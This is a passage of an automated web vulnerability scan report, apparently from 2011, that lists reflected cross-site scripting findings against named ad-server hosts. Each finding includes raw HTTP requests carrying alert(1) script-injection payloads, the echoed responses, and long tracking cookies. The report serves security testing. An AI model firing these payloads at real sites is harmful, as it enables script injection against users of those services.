Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00p3n060k0p50parllkxlm503s3e00p3n060k0p50pcg5lkxlm5026sw00p3n060k0p50p9rslkkpke0go550173n060k0q517am5lkkxr8002zw0103n060k0q510cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00p3n060k0p50pcnolkxlm5026sw00p3n060k0p50pabelkxlm5026sw00p3n060k0p50pdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00p3n060k0p50paoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00p3n060k0p50pe3qll1dpj000000023n020k02502bq3lkxlm5026sw00p3n060k0p50paoilkxlm503s3e00n3n000k00500bvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k005008ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00p3n060k0p50pc5flkxlm5026sw00p3n060k0p50p56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00p3n060k0p50pawklkxlm5026sw00p3n060k0p50pasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00p3n060k0p50pc5rlkov6e0000000s3n060k0q50saw8lkxlm503s3e00p3n060k0p50pc60lkxlm5026sw00p3n060k0p50pdc4lkxlm5026sw00p3n060k0p50pd26lkxlm5026sw00p3n060k0p50pdnjlkxlm503s3e00p3n060k0p50pcbclkxlm5026sw00p3n060k0p50pc85lkxlm5026sw00p3n060k0p50pcsslkxlm503s3e00p3n060k0p50pc80lkb5u209jqc0063e000j00500ag2lkd7nq0o85w01c3n060k0q519c1elkxlm5026sw00p3n060k0p50pc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00p3n060k0p50pc8flkxlm5026sw00p3n060k0p50pa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00p3n060k0p50p9z6lkxlm5026sw00p3n060k0p50pdbtlkxlm5026sw00p3n060k0p50p0kllklhm40c4010053l000k00500dyllkxlm5026sw00p3n060k0p50p9q4lkxlm5026sw00p3n060k0p50pb3zlkxlm503s3e00n3n000k005009q5lkb5u20mfs300o3l000k005009mjlkxlm5026sw00f3m000k00500dgflkkpke0f2un0173n060k0q5170t7ljyxb412iii01k3n060k0q519bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00p3n060k0p50pd86lklhm40c4010053l000k00500cwalkxlm5026sw00p3n060k0p50pdqllkxlm5026sw00p3n060k0p50pd84lkxlm5026sw00p3n060k0p50pdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00p3n060k0p50pcxdlkxlm503s3e00p3n060k0p50p719lkb5u20omkz00v3n060k0p50q71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00p3n060k0p50pcc3lkxlm5026sw00p3n060k0p50pdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00p3n060k0p50p4wclkb5u20q7vh00t3n000k00500a0ulkxlm503s3e00n3n000k005005mrlkb5u20mfs300o3l000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000023n020k02502cbplkxlm5026sw00p3n060k0p50pbwjlkkyy00gerj00y3n060k0q50y9gelkxlm503s3e00n3n000k00500; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Set-Cookie: vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724eyja103210e24f204103210524na8i103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 11 May 2011 15:46:34 GMT
Content-Length: 2982

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=58
...[SNIP]...
V9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D6a55c"><script>alert(1)</script>2825b35e074;ord=1305128794280">
...[SNIP]...

5.90. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99928"-alert(1)-"f8c37699d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tent=ch&tlfs=ch&tmen=ch&tphv=ch&tspt=ch&tclb=ch&rtg=ga&brw=cr3&os=wn7&prm=1&efo=0&atf=0&uatRandNo=56968&ad_type=ad&section=1406776&ad_size=300x250&cb=9939601230&99928"-alert(1)-"f8c37699d8=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:02 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:02 GMT
Pragma: no-cache
Content-Length: 4450
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?99928"-alert(1)-"f8c37699d8=1&Z=300x250&atf=0&brw=cr3&cb=9939601230&efo=0&os=wn7&pfm=1&prm=1&rtg=ga&s=1406776&tclb=ch&tent=ch&tlfs=ch&tmen=ch&tphv=ch&tspt=ch&uatRandNo=56968&_salt=263683752";var RM_POP_COOKIE_NAME='ym_pop_freq';
...[SNIP]...

5.91. http://ad.turn.com/server/bid/fan.bid [requestId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/bid/fan.bid

Issue detail

The value of the requestId request parameter is copied into the HTML document as plain text between tags. The payload 66103<script>alert(1)</script>0f833ad4bfb was submitted in the requestId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/bid/fan.bid?pub=10063193&cch=10063206&l=300x250&requestId=C1Qs4Xi5Px9F.b2Qs4Xi5Px9F66103<script>alert(1)</script>0f833ad4bfb&ref=http%3A%2F%2Ffan-nonugc-foxaudiencenetwork.com&rand=1305125955287 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=49lfYbaSZC9sULu0Dsc9j4A0w_TJT6a7zSU93Wiv2By76nVUEQrqCfHGx7lLD55eJmGhHmlhz1tR1Ra54XLx9RvZTBNkiE7yn98nPyVRl25NAD9CzxyIa9WvGJtW6WWCcjZ2TdY02khAi5MXfrKXhTf3SlTsAkOoc67-nv9-JHzSvxHuaHQxpaIHd_HHvZgiEVoPtTPaqqoBSERNKypQSfr0Gvi67fABIdrDFkqH2pQDIoPfzh4dVMv54jxCLhrOuI8NBtfI3ukcD9crr6R3u7CvkqMXlcbx7Bi1EQRMvI0-QhF5lC0iuRWvKfJUQQnxoBFz3gsHFXxga30AxLTjd6eaygH6z21ZoH2a5fzloxhETDdhtdfsA0_G8wbchlE2Jng8vXLODwTGR7IM2rWUncwOw-WQzu27JDbm3zb28UIJSJS-gRbd6_lq_zsnWqQtDXki2e30ar-nIrZEby3IbX6ktS-7WSKCQ1cVQgpNNs6dzg1gLvSIwhzJ9CHnb7dyS2Rp-0JlDPDEgt7Boz_e8WX3WPl8VwFiOy0wP-CPeF60YkqIZmomQUOJddHNg8LosM3maYue6dGjGF5IpE3TfJaw7nJrYwXW28_gU2aUnfZXH1lxhSJ-Hkbx3LH7fNgeY6bUajCjQG3fHDdMG1fIjogqfEFqIPqWXHKrerlWzJ7we_lb5X3qA4azxNwDCgK1zj9AF5M8L0zjRkTi2bVOH7laPTu6jXJXf9E0wa_7P4eukRxpOSUPvzPMefMiS3F6CsA8r7p-w6Lx2aUQMF8sCClmSitS-MBruUq0LslgxFrkbtcNS092XfJ_iH1-qEzxBAK6vn5XEPH6CoDPO3SATbCvkqMXlcbx7Bi1EQRMvI09kp1qU922MWhgseCZ0yA9oBFz3gsHFXxga30AxLTjd3BNZ8Et-uLgMxsAErE71LIZKf-ZGF5mqZT4qAr6KwJ6_AZGFehbXKZVluek1-8cUSfpHBCWTc_WhsiuKHISwceCRhMEP-vqrTNfrAq34bF-UV7qwiA-DzdS3NAJnUwH98VKwCrgDD4ecVOAJt87zXnTicn6ppii7NkwfMnY3YnceJYheWkTLK5FfrssiaKppuFTVjpsaG2BvnPs8uC37Bf8FuaBd0zHMfaXMlXvmiRSSUUWuwcNPPHI9kbqCz_xT5cdd99vC4bC6OgoVXOU4XuiolLtxfX4Bt77mqmNWwAMzYy1HB58LncgBnIV8SuYwWjSqAhDRerjsLTJstXn3k93fAGg3NL2q2xrCePtC960g6vIHw2Jyhqnl0AuzEQ9uy2OhqmTSqb5s_vom2S9BdFry2mOq25RwJMysyYojbq5OEH0e8-9WHwCznRNoiPpAVtpRwkZU4LlGw1pa_aQSINqN0AbiEW6mez9vdByqElcPwGqCniUOGScBtRFWce59NkPEWuLK2RvocYs-w2VCSU29xo9t_eELo-qOr3V4b_6rJ6qoWJfLTC4s23Ovgz6z5gGPawgMxEaUTfILlas0AGOPEOAFO1Os5ybA_YPGmqcY5VMRQ0UuWRFg4faK4le06zc6zX7XuyCbrmiyrXAF7h4ukd_tYO2W-vdTSaO8z9e31SEv8mTtg6054eJlg8NRYsjsOwv-PUrBYYdnUrqIaKXbp8yFKNIGg1jm4dCMTx11A2o0sOQ5ccvSzQCVo4-YLedP_zRmBDU16GMmAX4vi6cES2Ns5aNknwfVZ8YJqSm4VNWOmxobYG-c-zy4LfsF1fViSQW9FxwtaoTED3u2cBJRRa7Bw088cj2RuoLP_FPnAzMrCiv6oWNkFhSHNDPNV5g-5umsVHXlQ3P2lQ-Ini3QKeItojaDoDbISABCFerBhJYEPL4UzdyOj82p3ETwnd8AaDc0varbGsJ4-0L3rRCWQBFgLGhPxYltUIyEQgLsBIQDOH8CUV4l-WCvOMJ8ZoRBsb45KVHuJaNoYl3viGLFY5FXqH7Kxgixse5VNukW2lHCRlTguUbDWlr9pBIg8Hkwp6ej4-1GJtnnt-GDOjketUOewYnKj5VAKGNuTapv-s71Id9C6Et0jKrqPrA341fYNvaM9xh9GX-_ZJ3L2SOPEOAFO1Os5ybA_YPGmqcF99XWuA3J5hzU_ecr1Gi2oeNg2RC4vMx5FjUiqRrmO0-mh5LMTfhrtRFIqx5jm-AZvTZNfGrAuabv0M5A8DouosjsOwv-PUrBYYdnUrqIaIHNHYRAxeinCck4FrVYQDAxQ4YYoGSDsz6HlzI-Hkj_TjHLfuthDLFZ1MLJVKZ8oQHFXRs7s5tJoMmmzd2oSgOu1W98HVFnqHBnOdpDfkHAlridfFNnlS6-nlSx7tTBerbAIeI2vlGUfbG0ZNxEUHDEA1Jh1JmSIm4qhQ12_7hjpyvEb6miC_66VvSL5Pml5WgPd9FpDjFgzufMcbyyJxOBEwyLEP-hWW5-kmOATgFPehnB2LM1zLOIXx4ZnMe0z0LhSbd_dEDGN9v5_RAIItiovjHQ4Cmjst0uS_ZAN5dmUmURXlsENb9xU6Mz9VMuO7pvYl8H7-HUJl2Ka6xoLyLZbtzyEbcWUGqqhqa9tiX1Ool3nXRVKN-1LzOuXfM3NVtJs4f61ul8zZhh25WM8DyuIZxsqa7lOxOrOQMHdw4dRwEAwKtxxI_6b-FutaN-Lv-U41umJyCpRL1lt1cGgEpB5hD13EPwO5s5-DwMGD6aoN8-37PGC9cyesf200GnzzZRiN9PqVIEPxwQb1jhhWbAkOuzsv3JtzVI0PtUqJ35DfE9ZhLI-srA5i46CagcI8CeQHj43XhmSTC0zqxgUpWBkpu7d1CWvPFLelubWUsUYzfwwIac3OVd4asDRy4Tb3ejyv3BQtedQeCLUOqeg0SFq_skUz0u9ij_v1VgfIXakRmBHzdvCY-JOe_XTrWj6RJUGHeC3nCN4x_UZC69s55XOiKPcyt6l9iKxGmUQqMunAXp1F8JSJEG7l6OPv1fjk2t8lMpvAttvjIHDirSW0fVf72b0bbH4YNLu_Hr3-dKiYlgTf7HqVNZQWUbK-DV9szgBiAs1SiDN7PvqaLqTr1TdM_3KWeoJO-CnSEWgr9Qozp9kcrjIK5abX-GWVdsDOQmjEJeDHB1vBCgSzPg8RYTgMVW3E4SxfywkVDkUHR89emr2ZPiQMIOqLpsK7AHmj_oLcuTGyfXxMAHHkZzF_kjzxNN9ZylJk4PeTQeSCNmSuwd6Ui7h291sdfTURN_H05iExVYofrvkJ5TQYUNfK3E4iJk_um-_UF55g3dXD1xQrJtwIJ75WF2AZJh9J7588Z6Lsj33fSvPRriFKu-9iW4vdfapgN28zxEb9z3o9S5VhjrAU5oaTtgSb_n-uusLm7uJxCGZGZGB8Gj332u6Qw9fjZOAN9kWDjrF9jr4TxQY3mkp4Dt7Hm1UzS7lEsBzRNL996qx_doUESD1XIFIHHtJQvkRk6L9OlRnxWZyIC-LgTGZBprvbky445Uh8PxXOesWKmtIxFp0u_LMNGGa98xE0cp24rr959_cZV8G9amf0P1ImCBwaKqNcKpIl1XQrRjFhJGRjdFTc7TZeHSZXWFP5lHnxiOAgLNRsRn-d3BIbgrKMLgoG44wFioyFmgaSIzVIIxqT36kRgQZngJXoo; fc=FSROkif6QEzQTtpBUb36S_gNoF-ZKYigcfXOCrgeHn_ucz5cXW5Mlwmu42BXqLr6rRqQpaKBKyof5NYMw3qm9wvMqEF5Nki8mb1vSqmztIXwgXaghxUZ0Yi8V_8u0E15pwNGRrcYbOFXslFF8JgPJ4hlfd5Vr1apsTJViSHXFg8nEpLOK5atrYviv-joUTkPwwO-8N2ttNV8JartNM9RLBsnc2X8IKfd5H6yzgRflMC-yL_ByfmJaqt39FhxYp5a_s1UDK-soNrH30pJLaCdOjfsdyfcA83SjMBxymPmvd0agfidLwaUjnraLpvT1tPzG0sqnNvhyDQv8I1-OfpErfpZT2r-ImqIbIee7QyEpWA; pf=vMu105fDV86s5u_pfyzkwWq9eKoz4vDlk7rwaibxJdAbKFeXPku5ncGXhNYMJlHrQpSWfMg4zJTXkUbK3_tEItsgHB2gbaTLwk5wVJg2CJ5r03FkicUqy5fZngozU5xV80rzw8etfwG0ZJu3zdHyKyYNkVIYm0n9tbxRH_3UGWCwrQWbS3lZSCmRIyvnc-kLfISaeqE-ZUmsIsRUyu_I_fEK6LCvtj285L5y13Ikufo4bsnngTREyO1X2ATZ9AxN0vpx9w5GxVO9JmXYcmvlCHsLc4AF1btfOvnkCaP3RArXXwR6V4Ksfpi1cswTiSLUBEm5i8bzW7mEMZhpQgv3LqEKXyqFnVZw8YfekqmE25S_8-12ak9fScdBgH3lVdsZs9XfxCr3cVJI8tLj7JiLJGwTUCSASu1ibIHS4OGBGcxbKwUqO9_3MKVuYpEZdjF9tUAfHMBY5s2dpgrQ5VC82JcD3euh61mT_VMYuakVhlR-OHtE-Re4RfkXRbJHjS4w8X1P_LkyFT3R2EcSDZwEpuUIHTWNQ166lrHqhAqYXRsaNpyt6KVR_Um3RFK2MjvmYeC8ZphcKIoslYXD1lGq6CP5ra86jR4zvm8n3VYqg2ogaaYciwdQx7sk7knKiUYvhBKntDDGVOKbGcAJL67dnQ3rM0p0cVo3Ns0jK1YWO_YEPvtiHiI-m5NFNmGYB4mTfSjsuxl8cTU7MvhDb4Q_h6eR75tfLrUUQuldN97Wxp4nVs-8ME2jpHza43k_08481E_iBBu4i3HQEFsb4pCT2YEnRQG0RZCaNcuRWzPd6swjm2jBrbL93I_yBuPE3vfjCWmUyZVUMglgitahHAnOi5HprGMLLpOWaQ3awfFeLSBFb-E-DAEk68R-g_CBN4z-IWxmK_ufHIIKd9jBhCu205KJTktKpSinfK343eirEtNXXGmqbemclXcqZzRxmbGck50doO6tfSL-z4w5P-iw-kG2zrYVQnX4Sex78zOtAR1YF7LEgwPewS3-B3BlJAuP44G4dwDWYdHBRxVJC1gJiiIKliRqBJ8A3Y1mclt8B8CTk1tvGOZ7bQtHCPCnY2QcTvouxdxcraF60D7_gKkGz23gLH4DRBu5RbLJgV6fOENYzrjRKSlgdkIlfg62zHuMO1RIiJCOWku-TRwGy-sobhN0G40TB13tFaokeP3q4qRFjKt7q6zRLjFPtvoxlW3FG6ZkiIC1GqE2NESz84uwdoK3IkgBvco7FdqYllL3IRFY79Mnc0fkrSE4VRhUo57RQ_l4Et_j3VgRE4TNfV9uTzUbm62bBdQkozhVDriioPe3W1Xx5FC0wTFI1apXagb-3z-7Iv8eC59WEsDQhpXp8VSSlkCfph7x6AFKzdRD_efbtSxqsgwqVuezCr7BMdhWe_R8R-5gMiqMFz6F1AU7-oRK2Rc62ojp2ntZpv2JWnM1_shCytqZcxQ4cr6Qdtkpg-xmvMfX9sb3ndGxt2ALx8zrkK1cdUFzUwN3DhGVZzdGT1G1rUJfRzp_RLvDZfjxj8z8u46qTjrGqUzWVTBwz4m1-zIqP_FPemJAIq47trqtOQK252duo7MUdrg3JpTD3RarrKUNiRJnOsHAEE3xHheht3ivBnz3hwow8XaUE6U; uid=2931142961646634775; rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 1059
Date: Wed, 11 May 2011 15:23:30 GMT

C1Qs4Xi5Px9F.b2Qs4Xi5Px9F66103<script>alert(1)</script>0f833ad4bfb={"result":{"cpm":1520,"ad":"http://ad.turn.com/server/ads.js?pub=10063193&cch=10063206&code=10065709&l=300x250&aid=25922484&ahcid=1092353&bimpd=7nA0ClRWctcybjplXNzfV97_Ey90AjyntQ8HezALd79hhdMlBZP_el1B
...[SNIP]...

5.92. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adcb3"><script>alert(1)</script>b1542407aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=adcb3"><script>alert(1)</script>b1542407aad&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=49lfYbaSZC9sULu0Dsc9j4A0w_TJT6a7zSU93Wiv2By76nVUEQrqCfHGx7lLD55eJmGhHmlhz1tR1Ra54XLx9RvZTBNkiE7yn98nPyVRl25NAD9CzxyIa9WvGJtW6WWCcjZ2TdY02khAi5MXfrKXhTf3SlTsAkOoc67-nv9-JHzSvxHuaHQxpaIHd_HHvZgiEVoPtTPaqqoBSERNKypQSfr0Gvi67fABIdrDFkqH2pQDIoPfzh4dVMv54jxCLhrOuI8NBtfI3ukcD9crr6R3u7CvkqMXlcbx7Bi1EQRMvI0-QhF5lC0iuRWvKfJUQQnxoBFz3gsHFXxga30AxLTjd6eaygH6z21ZoH2a5fzloxhETDdhtdfsA0_G8wbchlE2Jng8vXLODwTGR7IM2rWUncwOw-WQzu27JDbm3zb28UIJSJS-gRbd6_lq_zsnWqQtDXki2e30ar-nIrZEby3IbX6ktS-7WSKCQ1cVQgpNNs6dzg1gLvSIwhzJ9CHnb7dyS2Rp-0JlDPDEgt7Boz_e8WX3WPl8VwFiOy0wP-CPeF60YkqIZmomQUOJddHNg8LosM3maYue6dGjGF5IpE3TfJaw7nJrYwXW28_gU2aUnfZXH1lxhSJ-Hkbx3LH7fNgeY6bUajCjQG3fHDdMG1fIjogqfEFqIPqWXHKrerlWzJ7we_lb5X3qA4azxNwDCgK1zj9AF5M8L0zjRkTi2bVOH7laPTu6jXJXf9E0wa_7P4eukRxpOSUPvzPMefMiS3F6CsA8r7p-w6Lx2aUQMF8sCClmSitS-MBruUq0LslgxFrkbtcNS092XfJ_iH1-qEzxBAK6vn5XEPH6CoDPO3SATbCvkqMXlcbx7Bi1EQRMvI09kp1qU922MWhgseCZ0yA9oBFz3gsHFXxga30AxLTjd3BNZ8Et-uLgMxsAErE71LIZKf-ZGF5mqZT4qAr6KwJ6_AZGFehbXKZVluek1-8cUSfpHBCWTc_WhsiuKHISwceCRhMEP-vqrTNfrAq34bF-UV7qwiA-DzdS3NAJnUwH98VKwCrgDD4ecVOAJt87zXnTicn6ppii7NkwfMnY3YnceJYheWkTLK5FfrssiaKppuFTVjpsaG2BvnPs8uC37Bf8FuaBd0zHMfaXMlXvmiRSSUUWuwcNPPHI9kbqCz_xT5cdd99vC4bC6OgoVXOU4XuiolLtxfX4Bt77mqmNWwAMzYy1HB58LncgBnIV8SuYwWjSqAhDRerjsLTJstXn3k93fAGg3NL2q2xrCePtC960g6vIHw2Jyhqnl0AuzEQ9uy2OhqmTSqb5s_vom2S9BdFry2mOq25RwJMysyYojbq5OEH0e8-9WHwCznRNoiPpAVtpRwkZU4LlGw1pa_aQSINqN0AbiEW6mez9vdByqElcPwGqCniUOGScBtRFWce59NkPEWuLK2RvocYs-w2VCSU29xo9t_eELo-qOr3V4b_6rJ6qoWJfLTC4s23Ovgz6z5gGPawgMxEaUTfILlas0AGOPEOAFO1Os5ybA_YPGmqcY5VMRQ0UuWRFg4faK4le06zc6zX7XuyCbrmiyrXAF7h4ukd_tYO2W-vdTSaO8z9e31SEv8mTtg6054eJlg8NRYsjsOwv-PUrBYYdnUrqIaKXbp8yFKNIGg1jm4dCMTx11A2o0sOQ5ccvSzQCVo4-YLedP_zRmBDU16GMmAX4vi6cES2Ns5aNknwfVZ8YJqSm4VNWOmxobYG-c-zy4LfsF1fViSQW9FxwtaoTED3u2cBJRRa7Bw088cj2RuoLP_FPnAzMrCiv6oWNkFhSHNDPNV5g-5umsVHXlQ3P2lQ-Ini3QKeItojaDoDbISABCFerBhJYEPL4UzdyOj82p3ETwnd8AaDc0varbGsJ4-0L3rRCWQBFgLGhPxYltUIyEQgLsBIQDOH8CUV4l-WCvOMJ8ZoRBsb45KVHuJaNoYl3viGLFY5FXqH7Kxgixse5VNukW2lHCRlTguUbDWlr9pBIg8Hkwp6ej4-1GJtnnt-GDOjketUOewYnKj5VAKGNuTapv-s71Id9C6Et0jKrqPrA341fYNvaM9xh9GX-_ZJ3L2SOPEOAFO1Os5ybA_YPGmqcF99XWuA3J5hzU_ecr1Gi2oeNg2RC4vMx5FjUiqRrmO0-mh5LMTfhrtRFIqx5jm-AZvTZNfGrAuabv0M5A8DouosjsOwv-PUrBYYdnUrqIaIHNHYRAxeinCck4FrVYQDAxQ4YYoGSDsz6HlzI-Hkj_TjHLfuthDLFZ1MLJVKZ8oQHFXRs7s5tJoMmmzd2oSgOu1W98HVFnqHBnOdpDfkHAlridfFNnlS6-nlSx7tTBerbAIeI2vlGUfbG0ZNxEUHDEA1Jh1JmSIm4qhQ12_7hjpyvEb6miC_66VvSL5Pml5WgPd9FpDjFgzufMcbyyJxOBEwyLEP-hWW5-kmOATgFPehnB2LM1zLOIXx4ZnMe0z0LhSbd_dEDGN9v5_RAIItiovjHQ4Cmjst0uS_ZAN5dmUmURXlsENb9xU6Mz9VMuO7pvYl8H7-HUJl2Ka6xoLyLZbtzyEbcWUGqqhqa9tiX1Ool3nXRVKN-1LzOuXfM3NVtJs4f61ul8zZhh25WM8DyuIZxsqa7lOxOrOQMHdw4dRwEAwKtxxI_6b-FutaN-Lv-U41umJyCpRL1lt1cGgEpB5hD13EPwO5s5-DwMGD6aoN8-37PGC9cyesf200GnzzZRiN9PqVIEPxwQb1jhhWbAkOuzsv3JtzVI0PtUqJ35DfE9ZhLI-srA5i46CagcI8CeQHj43XhmSTC0zqxgUpWBkpu7d1CWvPFLelubWUsUYzfwwIac3OVd4asDRy4Tb3ejyv3BQtedQeCLUOqeg0SFq_skUz0u9ij_v1VgfIXakRmBHzdvCY-JOe_XTrWj6RJUGHeC3nCN4x_UZC69s55XOiKPcyt6l9iKxGmUQqMunAXp1F8JSJEG7l6OPv1fjk2t8lMpvAttvjIHDirSW0fVf72b0bbH4YNLu_Hr3-dKiYlgTf7HqVNZQWUbK-DV9szgBiAs1SiDN7PvqaLqTr1TdM_3KWeoJO-CnSEWgr9Qozp9kcrjIK5abX-GWVdsDOQmjEJeDHB1vBCgSzPg8RYTgMVW3E4SxfywkVDkUHR89emr2ZPiQMIOqLpsK7AHmj_oLcuTGyfXxMAHHkZzF_kjzxNN9ZylJk4PeTQeSCNmSuwd6Ui7h291sdfTURN_H05iExVYofrvkJ5TQYUNfK3E4iJk_um-_UF55g3dXD1xQrJtwIJ75WF2AZJh9J7588Z6Lsj33fSvPRriFKu-9iW4vdfapgN28zxEb9z3o9S5VhjrAU5oaTtgSb_n-uusLm7uJxCGZGZGB8Gj332u6Qw9fjZOAN9kWDjrF9jr4TxQY3mkp4Dt7Hm1UzS7lEsBzRNL996qx_doUESD1XIFIHHtJQvkRk6L9OlRnxWZyIC-LgTGZBprvbky445Uh8PxXOesWKmtIxFp0u_LMNGGa98xE0cp24rr959_cZV8G9amf0P1ImCBwaKqNcKpIl1XQrRjFhJGRjdFTc7TZeHSZXWFP5lHnxiOAgLNRsRn-d3BIbgrKMLgoG44wFioyFmgaSIzVIIxqT36kRgQZngJXoo; fc=FSROkif6QEzQTtpBUb36S_gNoF-ZKYigcfXOCrgeHn_ucz5cXW5Mlwmu42BXqLr6rRqQpaKBKyof5NYMw3qm9wvMqEF5Nki8mb1vSqmztIXwgXaghxUZ0Yi8V_8u0E15pwNGRrcYbOFXslFF8JgPJ4hlfd5Vr1apsTJViSHXFg8nEpLOK5atrYviv-joUTkPwwO-8N2ttNV8JartNM9RLBsnc2X8IKfd5H6yzgRflMC-yL_ByfmJaqt39FhxYp5a_s1UDK-soNrH30pJLaCdOjfsdyfcA83SjMBxymPmvd0agfidLwaUjnraLpvT1tPzG0sqnNvhyDQv8I1-OfpErfpZT2r-ImqIbIee7QyEpWA; 